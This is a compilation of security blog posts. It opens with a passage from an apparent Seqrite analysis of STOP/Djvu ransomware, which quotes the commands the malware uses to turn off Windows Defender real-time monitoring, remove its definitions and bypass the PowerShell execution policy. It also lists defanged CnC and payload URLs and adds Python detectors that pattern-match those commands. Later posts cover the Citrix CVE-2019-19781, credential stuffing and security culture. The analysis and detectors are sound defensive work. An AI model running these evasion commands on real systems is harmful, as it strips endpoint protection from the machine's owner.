It stores the stolen data in a randomly named folder in the ProgramData directory. In this directory, a few ‘.zip’ files are created containing files such as information.txt, which holds details of the user and machine, running processes and the software installed on the system. Passwords and credentials retrieved from browsers and other software are stored in passwords.txt. The remaining information is stored in directories and files named after the respective software.

Fig. 9: Vidar File Write

There is one additional file named ID which contains data in the form of an SQL database with tables such as logins, meta, stats, sync_entities_metadata and sync_model_metadata. These tables mainly hold the user’s browser-related data. All of this data is then sent to Vidar’s CnC, which in this case is hxxp://crarepo[.]com/. Changes in the CnC servers have been observed over the period.

Fig. 10: Vidar HttpSendRequestA

     2. Updatewin1.exe:

This component is mainly used to hide the ransomware’s presence and to evade behaviour-based detection. It shows similarity with the Vilsel trojan family.

First, it re-executes itself with elevated privileges. The elevated process then runs PowerShell with the following command line to change the execution policy from the default Restricted to RemoteSigned, which allows locally created scripts to run without a digital signature.

powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned

Fig. 11: Updatewin RegSetValue

updatewin1.exe then drops script.ps1, containing the command ‘Set-MpPreference -DisableRealtimeMonitoring $true’, in the %temp% location. A new PowerShell instance is started with the parameters:

-NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File %AppData%\Local\script.ps1' -Verb RunAs}"

This runs PowerShell with administrator privileges and bypasses the execution policy for that PowerShell instance. It executes script.ps1, which disables Windows Defender real-time protection. It also removes the downloaded Windows Defender updates and signatures using the command:

mpcmdrun.exe -removedefinitions -all

Task Manager is also disabled through a registry change, after which updatewin1.exe deletes itself using a batch file.
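The defence-evasion chain described in this section (execution policy changed to RemoteSigned, an elevated PowerShell started with -ExecutionPolicy Bypass, Set-MpPreference disabling real-time monitoring, mpcmdrun.exe -removedefinitions -all, Task Manager disabled through the registry) is the kind of sequence a process-creation log can surface. The Python below is an added example, not Seqrite’s detection logic: it runs a small weighted rule set over constructed Sysmon-style command-line records and flags a host when several links of the chain appear within a short window, so that a lone administrator choosing RemoteSigned does not trip it. The log format and host names are made up; the DisableTaskMgr registry value name is the standard Windows policy value and is an assumption about how the page’s “changing the registry” step is done.

```python
"""Detect the updatewin1-style defence-evasion chain in process-creation logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Rule name -> (weight, case-insensitive regex over the command line).
# Patterns are derived from the command lines quoted in the write-up above; the
# DisableTaskMgr value name is the standard Windows policy value (an assumption here).
RULES = {
    "execpolicy_remotesigned": (1, r"set-executionpolicy\b.*\bremotesigned\b"),
    "powershell_bypass_elevated": (2, r"-executionpolicy\s+bypass\b.*start-process\b.*-verb\s+runas"),
    "defender_realtime_off": (3, r"set-mppreference\b.*-disablerealtimemonitoring\s+\$true"),
    "defender_defs_removed": (3, r"mpcmdrun(\.exe)?\b.*-removedefinitions\b.*-all\b"),
    "taskmgr_disabled": (2, r"\bdisabletaskmgr\b"),
}
COMPILED = {name: (w, re.compile(pat, re.IGNORECASE)) for name, (w, pat) in RULES.items()}
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+cmd=(?P<cmd>.*)$")

# Constructed Sysmon-like records: '<ISO timestamp> host=<name> cmd=<command line>'.
# WS-ADMIN shows a single benign policy change; WS-0042 shows the full chain.
SAMPLE_LOG = [
    "2020-01-15T09:00:01 host=WS-ADMIN cmd=powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned",
    "2020-01-15T10:12:00 host=WS-0042 cmd=powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned",
    "2020-01-15T10:12:03 host=WS-0042 cmd=powershell -NoProfile -ExecutionPolicy Bypass -Command \"& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File %AppData%\\Local\\script.ps1' -Verb RunAs}\"",
    "2020-01-15T10:12:04 host=WS-0042 cmd=powershell -NoProfile -ExecutionPolicy Bypass -File %AppData%\\Local\\script.ps1",
    "2020-01-15T10:12:05 host=WS-0042 cmd=powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true",
    "2020-01-15T10:12:07 host=WS-0042 cmd=\"C:\\Program Files\\Windows Defender\\mpcmdrun.exe\" -removedefinitions -all",
    "2020-01-15T10:12:09 host=WS-0042 cmd=reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t REG_DWORD /d 1 /f",
    "2020-01-15T11:00:00 host=WS-0042 cmd=notepad.exe C:\\Users\\u\\notes.txt",
]


def match_rules(cmdline: str) -> list:
    """Names of all rules matching one command line."""
    return [name for name, (_w, rx) in COMPILED.items() if rx.search(cmdline)]


def parse_line(line: str):
    """Parse one constructed record into (timestamp, host, command line), or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return datetime.fromisoformat(m["ts"]), m["host"], m["cmd"]


def score_hosts(lines, window=timedelta(minutes=10), threshold=5) -> dict:
    """Per host, the highest sum of distinct rule weights observed inside any `window`.

    A lone hit (an admin choosing RemoteSigned) stays below `threshold`; the chain
    reaches it, which is what separates the malware from ordinary administration.
    """
    hits = defaultdict(list)  # host -> [(timestamp, rule name)]
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ts, host, cmd = parsed
            hits[host].extend((ts, name) for name in match_rules(cmd))
    verdicts = {}
    for host, events in hits.items():
        events.sort()
        best_score, best_rules = 0, set()
        for i, (start, _name) in enumerate(events):
            rules = {name for ts, name in events[i:] if ts - start <= window}
            score = sum(COMPILED[name][0] for name in rules)   # each rule counted once
            if score > best_score:
                best_score, best_rules = score, rules
        verdicts[host] = {"score": best_score, "rules": sorted(best_rules), "suspicious": best_score >= threshold}
    return verdicts


if __name__ == "__main__":
    for host, verdict in score_hosts(SAMPLE_LOG).items():
        print(host, verdict)
```

The Set-MpPreference line is visible here only because the constructed log includes it as a command line; in a real estate the content of script.ps1 would surface through PowerShell script block logging rather than process creation, so the same rule should be applied to both sources.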

     3. Updatewin.exe:

This component has no suspicious or malicious activity of its own. It simply displays a Windows Update prompt so that any suspicious activity will be taken for Windows Update changes. The window has no minimize or close option; one has to kill the process to get rid of it.

Fig. 12: Fake Update Window

 

Ransom note:

Fig. 13: _readme.txt Ransom note

Over the campaign, the STOP ransom note has remained the same apart from a few small changes. It asks for a ransom of $980 and offers a 50% discount if payment is made within 3 days. The conversation with victims is carried out over email. The ransom note contains the user’s Personal ID, which is also stored in C:\SystemID\PersonalID.txt.

Statistics:

Fig. 14: Statistics

Since the introduction of the new RSA-2048 variant, we have seen a noticeable increase in infections. As the chart above shows, there was a gradual increase from August to November, with hits crossing the 120,000 mark. However, there has been a decrease in hits in December, which seems to have continued into January.

Conclusion:

Since the start of the STOP-Djvu campaign, the STOP authors have focused on changing payloads and extensions at short intervals, giving them a strong presence among ransomware families. Initially the authors relied on symmetric cryptography, hoping to collect ransom in most cases by using newer payloads and a unique key for each variant. The free decryptors for offline infections forced them to shift to asymmetric cryptography, which made the decryption of new infections harder. Propagation through cracked software, activators, keygens and fake software/OS upgrades has also been an effective way for this ransomware to spread.

IOCs:

Hashes:

74A9A644307645D1D527D7D39A87861C

F64CF802D1E163260F8EBD224E7B2078

959B266CAD13BA35AEE35D8D4B723ED4

9EE3B1BCF67A63354C8AF530C8FA5313

5B4BD24D6240F467BFBC74803C9F15B0

B0A89E143BABDA2762561BC7576017D7

290E97907E5BE8EA72178414762CD846

E3083483121CD288264F8C5624FB2CD1

URLs:

hxxp://ring2[.]ug/files/penelop/3.exe

hxxp://ring2[.]ug/files/penelop/4.exe

hxxp://ring2[.]ug/files/penelop/5.exe

hxxp://ring2[.]ug/files/penelop/updatewin.exe

hxxp://ring2[.]ug/files/penelop/updatewin1.exe

hxxp://ring2[.]ug/files/penelop/updatewin2.exe

hxxp://crarepo[.]com/

The post STOP (Djvu) Ransomware: Ransom For Your Shady Habits! appeared first on Seqrite Blog.

Companies increasingly reporting attacks attributed to foreign governments

More than one in four security managers attribute attacks against their organization to cyberwarfare or nation-state activity, according to Radware.

Nation-state intrusions soaring

In 2018, 19% of organizations believed they were attacked by a nation-state. That figure increased to 27% in 2019. Companies in North America were more likely to report nation-state attribution, at 36%. “Nation-state intrusions are among the most difficult attacks to thwart because the agencies responsible often have significant resources, knowledge of … More

The post Companies increasingly reporting attacks attributed to foreign governments appeared first on Help Net Security.

Cyber attackers turn to business disruption as primary attack objective

Over the course of 2019, 36% of the incidents that CrowdStrike investigated were most often caused by ransomware, destructive malware or denial of service attacks, revealing that business disruption was often the main attack objective of cybercriminals. Another notable finding in the new CrowdStrike Services Report shows a large increase in dwell time to an average of 95 days in 2019 — up from 85 days in 2018 — meaning that adversaries were able to … More

The post Cyber attackers turn to business disruption as primary attack objective appeared first on Help Net Security.

Budgetary, policy, workforce issues influencing DOD and intelligence community IT priorities

Information Technology spending by Department of Defense (DOD) and Intelligence Community (IC) agencies will continue to grow as they work to keep pace with the evolution of both the threat landscape and technology development, according to Deltek.

Intelligence community

The increasing sophistication of adversaries, expanding threat landscape, rapid pace of technology advancement and data proliferation continue to fuel the IC’s demand for tools and resources to meet mission objectives. IT solutions such as cloud computing, … More

The post Budgetary, policy, workforce issues influencing DOD and intelligence community IT priorities appeared first on Help Net Security.

Rethinking cyber scenarios—learning (and training) as you defend

In two recent posts I discussed with Circadence the increasing importance of gamification for cybersecurity learning and how to get started as a practitioner while being supported by an enterprise learning officer or security team lead. In this third and final post in the series, Keenan and I address more advanced SecOps scenarios that an experienced practitioner would be concerned with understanding. We even show how Circadence and Microsoft help seasoned practitioners defend against some of the most prevalent and advanced attackers we see across industries.

Here are more of Keenan’s insights from our Q&A:

Q: Keenan, thanks for sharing in this digital conversation with me again. I admire your passion for gamified cyber learning. I’d not put the two ideas together, that you can adopt gaming concepts—and consoles—in a way that makes learning the often difficult and evolving subject matter of “cyber” much more fun and impactful. Now that I’ve used Project Ares for a year, it’s hard to imagine NOT having an interactive, gamified platform to help me build and refine cybersecurity concepts and skills. Several friends and colleagues have also registered their teenagers for Circadence’s Project Ares Academy subscriptions to kickstart their learning journey toward a cyber career path. If kids are going to game, let’s point them to something that will build employable skills for the future.

In our last two blogs, we introduced readers to a couple of new ideas:

Now, let’s pivot and focus on practical cyber scenarios (let’s say Tier 1 or Tier 2 defender scenarios)—situations that would likely be directed to experienced cyber professionals to handle. Walk us through some of the detail about how Circadence has built SecOps gaming experiences into Project Ares through mission scenarios inspired by real cyber incidents pulled from news headlines, incorporating today’s most common attack methods such as ransomware, credential theft, and even nation-state attacks.

A: Sure. I’ll start with descriptions of a couple of our foundational missions.

Scenario one: Ransomware—Project Ares offers several mission scenarios that address the cyber kill chain around ransomware. The one I’ll focus on is Mission 10, Operation Crimson Wolf. Acting as a cyber force member working for a transportation company, the user must secure networks so the company can conduct effective port activity. However, the company is in danger as ransomware has encrypted data and a hacker has launched a phishing attack on the network, impacting how and when operators offload ships. The player must stop the ransomware from spreading and attacking other nodes on the network before it’s too late. I love this scenario because 1) it’s realistic, 2) ransomware attacks occur far too often, and 3) it allows the player to engage in a virtual environment to build skills.

Users who engage in this mission learn core competencies like:

  • Computer network defense.
  • Incident response management.
  • Data forensics and handling.

We map all our missions to the NIST/NICE work role framework and Mission 10 touches on the following work roles: System Security Analyst, Cyber Defense Analyst, Cyber Defense Incident Responder, and the Cyber Defense Forensics Analyst.

Image from scenario one: Ransomware

Scenario two: Credential theft—Another mission that’s really engaging is Mission 1, Operation Goatherd. It teaches how credential theft can occur via a brute force attack. In this mission, the user must access the command and control server of a group of hackers to disable a botnet network in use. The botnet is designed to execute a widespread financial scam triggering the collapse of a national bank! The user must scan the command and control server located at myloot.com for running services, identify a vulnerable service, perform a brute force attack to obtain credentials, and then kill the web server acting as the command and control orchestrator.

This scenario is powerful because it asks the player to address the challenge by thinking from an adversary’s perspective. It helps the learner understand how an attacker would execute credential theft (though there are many ways) and gives the learner a different perspective for a well-rounded comprehension of the attack method.

Users who engage in this mission learn core competencies like:

  • Network protocols.
  • Reconnaissance and enumeration.
  • Password cracking and exploration.

The NIST/NICE work role aligned to this mission is a Cyber Operator. Specific tasks this work role must address include:

  • Analyzing target operational architecture for ways to gain access.
  • Conducting network scouting and vulnerability analysis of systems within a network.
  • Detecting exploits against targeted networks.

Image from scenario two: Credential theft

Q: Can you discuss how Project Ares’ learning curriculum addresses critical threats from advanced state or state-backed attackers? While we won’t name governments directly, the point for our readers to understand is that the national and international cybersecurity stage is built around identifying and learning how to combat the tools, tactics, and procedures that threat actors are using in all industries.

A: Here’s a good example.

Scenario three: Election security—The mission we deploy in our next release of Project Ares, which now leverages cloud native architecture (running on Microsoft Azure), is Mission 15, Operation Raging Mammoth. It helps a cyber professional protect against an election attack—something we are all too familiar with through recent headlines about election security. As an election security official, the user must monitor voting systems to establish a baseline of normal activity and configurations from which we identify anomalies. The user must detect and report changes to an administrator’s access permissions and/or modifications to voter information.

The NIST/NICE work roles aligned to this mission include professionals training as a Cyber Defense Analyst, Cyber Defense Incident Responder, or Threat/Warning Analyst.

Image from scenario three: Election security

I’ve reviewed some of the specific cyber scenarios a Tier 1 or Tier 2 defender might experience on the job. Now I’d like to share a bit how we build these exercises for our customers.

It really comes down to the professional experiences and detailed research from our Mission and Battle Room design teams at Circadence. Many of them have explicit and long-standing professional experience as on-the-job cyber operators and defenders, as well as cyber professors and teachers at renowned institutions. They really understand what professionals need to learn, how they need to learn, and the most effective ways to learn.

We profile Circadence professionals in the Living Our Mission Blog Series to help interested readers understand the skill and dedication of the people behind Project Ares. By sharing the individual faces behind the solution, we hope current and prospective customers will appreciate Project Ares more knowing that Circadence is building the most relevant learning experiences available to support immersive, gamified learning of today’s cyber professionals.

Learn more

To see Project Ares “in action” visit Circadence and request a demonstration, or speak with your local Microsoft representative. You can also try your hand at it by attending an upcoming Microsoft Ignite: The Tour event, which features a joint Microsoft/Circadence “Into the Breach” capture the flag exercise.

To learn more about how to close the cybersecurity talent gap, read the e-book: CISO essentials: How to optimize recruiting while strengthening cybersecurity. For more information on Microsoft intelligence security solutions, including guidance on Zero Trust, visit Reach the optimal state in your Zero Trust journey.

The post Rethinking cyber scenarios—learning (and training) as you defend appeared first on Microsoft Security.

How does Artificial Intelligence boost the power of cybersecurity?

Estimated reading time: 2 minutes

An artificial intelligence (AI) revolution is brewing in cybersecurity. A recent market report pegged the global market for AI in cybersecurity at USD 7.1 billion in 2018, expected to reach approximately USD 30.9 billion by 2025, a CAGR of around 23.4%.

There is a sea change in cybersecurity attack patterns, with enterprises turning to new technology and approaches to stay ahead of these threats. Thanks to the increasing volume and velocity of modern-day threats, enterprises are rapidly moving towards a threat detection and response approach, and this is where artificial intelligence can greatly help.

Through AI-based solutions, enterprises will be able to improve threat intelligence, protection and detection at a much faster rate than before. AI enables this by reducing the need for specialized cybersecurity experts within the enterprise, which will be welcomed by an industry facing an acute skill shortage in this domain.

An easier way to deal with data overload

Currently, information security teams face an overload of data. The data is both structured and unstructured, and analyzing it is a manual and repetitive task. Teams spend inordinate amounts of time analyzing all this data by hand; the risk of error is high and the time is not spent productively.

Through machine learning and deep learning techniques, data analysis can be left to artificial intelligence, freeing cybersecurity employees to use their time more productively. By analyzing and tracking millions of data points from various sources, an AI system can be trained to better understand cybersecurity threats.

The power of automation

In the last couple of years, fears have been raised over whether artificial intelligence will take over jobs, leaving humans redundant. It is natural for such concerns to lead to pushback against the implementation of AI in a workforce. However, when it comes to cybersecurity, AI and its resultant tools like machine learning and automation will actually augment a workforce.

Automation, for example, takes over repeatable tasks and performs them at a pace far greater than any human ever can, providing faster and better results. The benefit for cybersecurity teams is twofold: fatigue is reduced and time is spent on finding better ways to secure the enterprise.

Speeding up incident response through Artificial Intelligence

According to the latest Ponemon study, the global average time to identify and contain a data breach is a whopping 279 days. Enterprises are aware that, given the magnitude of the threats around them, incident response has become a key priority, and artificial intelligence can be a key ally here.

AI can detect threats or suspicious activity through real-time analysis and send actionable intelligence to incident responders in a matter of seconds. By tapping into the power of artificial intelligence, enterprises will see a faster response to threats, enabling better security and intelligence.

Drive a more efficient organization

Cumulatively, the benefits of AI in cybersecurity add up to a more efficient organization. With better and more rigorous analysis of both unstructured and structured data, along with continuous assessment of new threats, an enterprise’s cybersecurity framework becomes far more solid and well defined. In the long run, AI-powered enterprises will be more efficient and more productive.

Seqrite understands the need for enterprises to integrate AI into their cybersecurity efforts. GoDeep.AI, Seqrite’s proprietary artificial intelligence capability, is now embedded in most of its product range, offering a cloud-based Deep Learning Module, an Advanced Behavior Detection System and other powerful features that together provide a unique AI-based cybersecurity solution.

The post How does Artificial Intelligence boost the power of cybersecurity? appeared first on Seqrite Blog.

Hackers check Citrix servers for weakness in remote code execution

At least eighty thousand organisations could be at risk.

Researchers have warned that cyber attackers are scanning for Citrix servers vulnerable to a critical ADC and Gateway security vulnerability.

Disclosed in December, the vulnerability, tracked as CVE-2019-19781, affects the Citrix Application Delivery Controller (ADC), previously known as NetScaler ADC, as well as Citrix Gateway, formerly known as NetScaler Gateway. The critical flaw, originally reported by Positive Technologies’ Mikhail Klyuchnikov, is a directory traversal that allows threat actors to carry out remote code execution (RCE) attacks if exploited.

These products are affected according to a Citrix security advisory:

  • Citrix ADC and Citrix Gateway version 13.0, all supported builds
  • Citrix ADC and NetScaler Gateway version 12.1, all supported builds
  • Citrix ADC and NetScaler Gateway version 12.0, all supported builds
  • Citrix ADC and NetScaler Gateway version 11.1, all supported builds
  • Citrix NetScaler ADC and NetScaler Gateway version 10.5, all supported builds

Researchers estimated that at least 80,000 organizations in 158 countries are ADC users and could thus be at risk. The affected organizations are mainly based in the US (about 38%), as well as the United Kingdom, Germany, the Netherlands and Australia.

“Depending on specific configuration, Citrix applications can be used for connecting to workstations and critical business systems (including ERP),” Positive Technologies says. “In almost every case, Citrix applications are accessible on the company network perimeter, and are therefore the first to be attacked. This vulnerability allows any unauthorized attacker to not only access published applications, but also attack other resources of the company’s internal network from the Citrix server.”

As reported by Bleeping Computer, security researchers have detected scans for Citrix servers potentially vulnerable to the bug.

Researcher Kevin Beaumont said on Twitter that one of his honeypots had observed “attackers reading sensitive credential config files remotely using ../ directory traversal (a variant of this issue).”

No public exploit code appears to be in wide use, at least not yet. In his own honeypot checks, SANS Technology Institute Dean of Research Johannes Ullrich noted that the current scans do not look “developed” in any sense (some of them are only GET requests), but added that “other sources I believe to be credible have shown that they can produce a code execution exploit.” A patch has not yet been released, but Citrix has published a mitigation. The company advises that IT administrators follow a series of instructions, which can be found here, to configure the recommended policy changes.

“Citrix strongly urges affected customers to immediately apply the provided mitigation. Customers should then upgrade all of their vulnerable appliances to a fixed version of the appliance firmware when released,” Citrix says.

In March of last year, Citrix disclosed a security breach in which attackers used password spraying to exploit weak account credentials.

The post Hackers check Citrix servers for weakness in remote code execution appeared first on .

How credential stuffing attacks use weak passwords to compromise accounts?

Estimated reading time: 2 minutes

In November 2019, over 2000 users of NordVPN, a service offering Virtual Private Networks (VPNs), saw their accounts being compromised. It was an example of credential stuffing, a type of cyberattack that takes advantage of human frailty regarding passwords to take over accounts.

Credential stuffing may seem similar to data breaches and brute force attacks, but there are several points of difference. In a data breach, much of the data stolen from an organization consists of user names and passwords, and the people who steal this data often sell it on the dark web for inordinate amounts of money.

The weakest link is weak passwords

Attackers obtain these credentials from various sources and take advantage of the fact that most individuals do not vary their user names or passwords across websites. In fact, most people use the same credentials on almost every website.

Hackers use automated credential stuffing software to try these credentials against websites. The rate of success is extremely low (0.1-0.2%), but when an attacker has access to more than a billion credentials, even such a low success rate can yield successful matches for 1,000 accounts.

The rest is easy, and scary, to guess: once inside these accounts, attackers can use them as they please. They can make unauthorized transactions, send malware to other accounts and generally create havoc. Credential stuffing attacks are becoming more and more prevalent; big names like Nest, Uber, Superdrug and even Dunkin’ Donuts have recently had to deal with them.

The importance of maintaining strong credentials

Preventing credential stuffing attacks is only possible by following an age-old cybersecurity strategy: strong passwords. Enterprises at risk of credential stuffing attacks need to keep on reiterating the importance of maintaining strong passwords along with other good cybersecurity habits to all their employees and partners across the supply chain.

Some of the key messages that need to be reinforced are:

Don’t use the same credentials across different websites

Employees don’t like remembering passwords, so they create one strong password and use it everywhere. This is a big no-no: as credential stuffing attacks demonstrate, if attackers can obtain a password through one site, it’s quite probable that they’ll be able to access all the other services you use (including financial information).

Enforce and popularize multi-factor authentication

Multi-factor authentication is the best defence against credential stuffing attacks. By adding a further layer of security and requiring users to complete an additional validation step at every login, it reduces the dependency on passwords. While it may be difficult for enterprises to implement an organization-wide multi-factor authentication policy, it should be used in as many places as possible.

Train employees to use strong, complex passwords

Security is a habit, rather than a process. Enterprises need to ensure they have a cybersecurity first mindset and the way to cultivate that is by continuously training and reminding employees about the importance of creating strong, dynamic passwords. This should be done at an onboarding stage and continuously in the employee lifecycle.

Blacklist suspicious IPs

Security teams should continuously analyze their data to identify where threats to the enterprise originate. It’s good practice to blacklist any suspicious IPs that keep cropping up, to lessen the chances of a cyberattack.
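As an added example (not Seqrite’s code) of how a security team could spot the sources worth blocking in its own login telemetry, the Python below groups constructed authentication log lines per source IP and flags sources that try many distinct user names with an overwhelmingly failed outcome, which is the signature of the automated stuffing the article describes (a tiny success rate spread across a huge credential list). It also separates this pattern from a single-account brute force, which hammers one user name, and lists the accounts a flagged source did get into, since those need an immediate reset. IP addresses are from the RFC 5737 documentation ranges, user names are made up, and the thresholds are illustrative.

```python
"""Flag credential-stuffing sources in authentication logs (added example, not Seqrite's code)."""
import re
from collections import defaultdict

# Constructed record format: '<ISO timestamp> ip=<source> user=<name> result=OK|FAIL'
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+ip=(?P<ip>\S+)\s+user=(?P<user>\S+)\s+result=(?P<result>OK|FAIL)$")


def parse_auth_log(lines):
    """Yield (ip, user, success) tuples; lines that do not match the format are skipped."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            yield m["ip"], m["user"], m["result"] == "OK"


def summarize_by_ip(lines) -> dict:
    """Per source IP: attempt count, success count and the set of distinct user names tried."""
    stats = defaultdict(lambda: {"attempts": 0, "successes": 0, "users": set()})
    for ip, user, ok in parse_auth_log(lines):
        s = stats[ip]
        s["attempts"] += 1
        s["successes"] += int(ok)
        s["users"].add(user)
    return stats


def flag_stuffing_sources(lines, min_attempts=20, min_users=20, max_success_rate=0.05) -> list:
    """Return sources that look like credential stuffing, most active first.

    Criteria (illustrative): many distinct user names from one IP, with a success rate far
    below what a real user population produces. A single user name tried many times is a
    brute force against one account, not stuffing, and is deliberately not matched here.
    """
    flagged = []
    for ip, s in summarize_by_ip(lines).items():
        if s["attempts"] < min_attempts or len(s["users"]) < min_users:
            continue
        rate = s["successes"] / s["attempts"]
        if rate <= max_success_rate:
            flagged.append({"ip": ip, "attempts": s["attempts"],
                            "distinct_users": len(s["users"]), "success_rate": round(rate, 4)})
    return sorted(flagged, key=lambda f: f["attempts"], reverse=True)


def compromised_accounts(lines, flagged_ips) -> set:
    """Accounts that saw a successful login from a flagged source; these need a forced reset."""
    return {user for ip, user, ok in parse_auth_log(lines) if ok and ip in flagged_ips}


def build_sample_log() -> list:
    """Construct a deterministic sample log: one stuffing source, normal staff, one brute force."""
    lines = []
    # Stuffing source: 300 distinct user names from one IP, 2 hits (about 0.7% success).
    for i in range(300):
        result = "OK" if i in (41, 179) else "FAIL"
        lines.append(f"2020-01-10T02:{i // 60:02d}:{i % 60:02d} ip=203.0.113.7 user=user{i:04d} result={result}")
    # Legitimate office logins: a few accounts per IP, mostly successful.
    for j in range(30):
        result = "FAIL" if j % 10 == 0 else "OK"
        lines.append(f"2020-01-10T09:{j:02d}:00 ip=198.51.100.{j % 5 + 1} user=staff{j % 12:02d} result={result}")
    # Single-account brute force: one user name hammered from one IP (not stuffing).
    for k in range(40):
        lines.append(f"2020-01-10T11:00:{k:02d} ip=192.0.2.9 user=admin result=FAIL")
    return lines


if __name__ == "__main__":
    log = build_sample_log()
    hits = flag_stuffing_sources(log)
    print(hits)
    print(compromised_accounts(log, {h["ip"] for h in hits}))
```

In production the same aggregation would be run over a sliding time window and fed into the blocklist the article recommends, and the `compromised_accounts` output is the list that should trigger password resets and MFA re-enrolment rather than just a block.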

Seqrite Endpoint Security helps enterprises prevent credential stuffing and other dangerous cyberattacks through its top-of-the-line protection solutions, integrating advanced technologies like Anti Ransomware, Advanced DNA Scan and Behavioral Detection System.

The post How credential stuffing attacks use weak passwords to compromise accounts? appeared first on Seqrite Blog.

Currency Exchange Company Travelex Hit By Ransomware Attack

Currency exchange giant Travelex has effectively been taken offline by a ransomware attack. 

The attack was first detected the night of December 31. Soon after, the company took its systems offline. A week later, Travelex is processing transactions with pen and paper at its 1,200 branches located in more than 70 countries. 

“To date, the company can confirm that whilst there has been some data encryption, there is no evidence that structured personal customer data has been encrypted. Whilst Travelex does not yet have a complete picture of all the data that has been encrypted, there is still no evidence to date that any data has been exfiltrated,” the company said in a public statement.

The hackers claim to have six months’ worth of sensitive customer data containing birthdates, credit card information, and insurance numbers. They have threatened to sell the information if their $6 million ransom isn’t delivered.

“The deadline for doubling the payment is two days. Then another seven days and the sale of the entire base,” the hackers were quoted as saying to BBC News.

The ransomware detected on the Travelex servers has been identified as Sodinokibi (also known as REvil), a “ransomware as a service” form of malware that is developed and maintained by the Sodinokibi hacking group and deployed by over 40 affiliates. This strain of ransomware was used in many of 2019’s most newsworthy ransomware campaigns, including concurrent attacks on 22 Texas municipalities.

Researchers believe the hackers took advantage of an unpatched critical vulnerability on the company’s VPN servers. Travelex had neglected to address these vulnerabilities for eight months after they were brought to the company’s attention.

The post Currency Exchange Company Travelex Hit By Ransomware Attack appeared first on Adam Levin.

Changing the monolith—Part 1: Building alliances for a secure culture

Any modern security expert can tell you that we’re light years away from the old days when firewalls and antivirus were the only mechanisms of protection against cyberattacks. Cybersecurity has been one of the hot topics of boardroom conversation for the last eight years, and has been rapidly increasing to higher priority due to the size and frequency of data breaches that have been reported across all industries and organizations.

The security conversation has finally been elevated out of the shadows of the IT Department and has moved into the executive and board level spotlights. This has motivated the C-teams of organizations everywhere to start asking hard questions of their Chief Information Officers, Chief Compliance Officers, Privacy Officers, Risk Organizations, and Legal Counsels.

Cybersecurity professionals can either wait until these questions land at their feet, or they can take charge and build relationships with executives and the business side of the organization.

Taking charge of the issue

Professionals fortunate enough to have direct access to the Board of Directors of their organization can also build extremely valuable relationships at the board level as well. As cybersecurity professionals establish lines of communication throughout organizational leadership, they must keep in mind that these leaders, although experts in their respective areas, are not technologists.

The challenge that cybersecurity professionals face is being able to get the non-technical people on board with the culture of change in regards to security. These kinds of changes in culture and thinking can help facilitate the innovation that is needed to decrease the risk of compromise, reputation damage, sanctions against the organization, and potential stock devaluation. So how can one deliver this message of Fear, Uncertainty, and Doubt (FUD) without losing the executive leaders in the technical details or dramatization of the current situation?

Start by addressing the business problem, not the technology.

The answer isn’t as daunting as you might think

The best way to start the conversation with business leaders is to begin by stating the principles of your approach to addressing the problem and the risks of not properly addressing it. It’s important to remember to present the principles and methods in a way that is understandable to non-technical persons.

This may sound challenging at first, but the following examples will give you a good starting point of how to accomplish this:

  • At some point in time, there will be a data breach—Every day we’re up against tens of thousands of “militarized” state-sponsored threat actors who usually know more about organizations and technical infrastructure than we do. This is not a fight we’ll always win, even if we’re able to bring near unlimited resources to the table, which is often rare itself. In any scenario, we must accept some modicum of risk, and cybersecurity is no different. The approach for resolution should involve mitigating the likelihood and severity of a compromise situation when it ultimately does occur.
  • Physical security and cybersecurity are linked—Anyone with hands-on access to hardware has many ways to pull data off the enterprise network and carry it out for later analysis. If an attacker gets hold of a laptop or mobile device whose storage is not encrypted, they can image the disk in minutes and work on an exact replica at leisure; and even with encryption enabled, the key must be protected (by a TPM, pre-boot authentication or the device’s secure enclave) rather than stored beside the data it protects. With examples like these you can state plainly that, in many cases, physical security is cybersecurity.
  • You can’t always put a dollar amount on digital trust—The collateral damage from a cyberattack goes well beyond dollars, and visible attention to cybersecurity and privacy threats demonstrates digital trust to clients, customers, employees, suppliers, vendors, and the general public. Digital trust underpins every digital interaction: it is the measurable expectation that an entity is who or what it claims to be and that it will behave as expected. It can set an organization apart from its competitors.
  • Everything can’t be protected equally; likewise, everything doesn’t have the same business value—Where are the crown jewels, and which systems’ failure would critically impact the business? Once those are identified, the organization has far less to worry about and protect. A second core principle should be, “When in doubt, throw it out.” Keeping data longer than necessary enlarges the attack surface and creates a liability to produce large volumes of data during legal discovery. The Data Retention Policy needs to reflect this, and it should be written with input from the business and General Counsel.
  • Identity is the new perimeter—Additional perimeter-based security appliances will not decrease the chance of compromise. Once an identity is compromised, perimeter controls become useless. Operate as if the organization’s network has already been compromised, as stated in principle #1. Focus investment on modern authentication, Zero Trust, conditional access, and detection of abnormal user and data behavior. Questions to ask now include: what is happening to users, company data, and devices both inside and outside the firewall? Think about data handling: who has access to what, why, and is that access within normal business activity?

The culture of change in the organization

If leadership is not on board with the people, process, and technology changes required to fulfill a modern approach to cybersecurity and data protection, any effort put into such a program is a waste of time and money.

You can tell immediately if you’ve done the appropriate amount of marketing to bring cybersecurity and data protection to the forefront of business leaders’ agendas. If the funding and the support for the mission is unavailable, one must ask oneself if the patient, in this case the organization, truly wants to get better.

If, during a company meeting, a CEO declares that “data protection is everyone’s responsibility, including mine,” everyone will recognize the importance of the initiative to the company’s success. Hearing this from the CISO or below does not have the same gravitas.

The most successful programs I’ve seen are those who have been sponsored at the highest levels of the organization and tied to performance. For more information on presenting to the board of directors, watch our CISO Spotlight Episode with Bret Arsenault, Microsoft CISO.

Stay tuned and stay updated

Stay tuned for “Changing the monolith—Part 2” where I address who you should recruit as you build alliances across the organization, how to build support through business conversations, and what’s next in driving organizational change. In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
